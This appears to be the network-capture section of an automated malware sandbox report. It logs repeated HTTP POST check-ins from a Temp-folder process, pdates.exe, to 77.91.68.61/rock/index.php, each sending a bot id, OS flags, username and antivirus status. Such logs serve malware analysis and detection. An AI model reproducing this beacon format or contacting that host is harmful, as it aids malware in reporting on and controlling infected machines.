Jul 27, 2023 01:34:10.514075041 CEST	3808	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:10.659008980 CEST	3809	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
254	192.168.2.5	49974	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:10.820462942 CEST	3810	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:10.928301096 CEST	3810	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
255	192.168.2.5	49975	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:11.118577003 CEST	3811	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:11.166440964 CEST	3811	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
256	192.168.2.5	49976	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:11.479568958 CEST	3812	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:11.528609037 CEST	3812	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
257	192.168.2.5	49977	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:11.705137014 CEST	3813	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:11.754723072 CEST	3813	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
258	192.168.2.5	49978	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:11.953263998 CEST	3814	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:12.231282949 CEST	3814	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:12.290754080 CEST	3814	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
259	192.168.2.5	49979	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:12.781689882 CEST	3815	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:12.830709934 CEST	3815	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49742	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:08.766648054 CEST	2859	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:08.816169024 CEST	2859	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
260	192.168.2.5	49980	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:14.076467037 CEST	3816	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:14.125946045 CEST	3816	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
261	192.168.2.5	49981	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:14.341654062 CEST	3817	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:14.414489985 CEST	3817	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
262	192.168.2.5	49982	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:14.641700983 CEST	3818	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:14.690120935 CEST	3818	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
263	192.168.2.5	49983	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:14.877954006 CEST	3819	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:14.925879955 CEST	3819	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
264	192.168.2.5	49984	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:15.162938118 CEST	3820	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:15.212131023 CEST	3820	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
265	192.168.2.5	49985	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:15.382893085 CEST	3821	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:15.431612968 CEST	3821	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
266	192.168.2.5	49986	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:15.590035915 CEST	3822	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:15.639098883 CEST	3822	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
267	192.168.2.5	49987	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:15.797283888 CEST	3823	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:15.845347881 CEST	3823	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
268	192.168.2.5	49988	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:15.999753952 CEST	3824	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:16.101803064 CEST	3824	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
269	192.168.2.5	49989	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:16.266437054 CEST	3825	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:16.427861929 CEST	3825	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49743	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:08.989274979 CEST	2860	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:09.041162968 CEST	2860	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
270	192.168.2.5	49990	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:16.600465059 CEST	3825	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:16.650218964 CEST	3826	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
271	192.168.2.5	49991	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:16.811749935 CEST	3826	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:16.861608982 CEST	3827	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
272	192.168.2.5	49992	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:17.056745052 CEST	3832	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:17.105307102 CEST	3832	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
273	192.168.2.5	49993	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:17.300000906 CEST	3832	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:17.348370075 CEST	3833	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
274	192.168.2.5	49994	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

